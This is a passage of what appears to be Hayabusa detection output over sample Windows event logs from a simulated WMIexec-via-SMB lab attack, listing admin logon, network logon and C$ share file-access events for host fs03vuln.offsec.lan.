10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.447 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 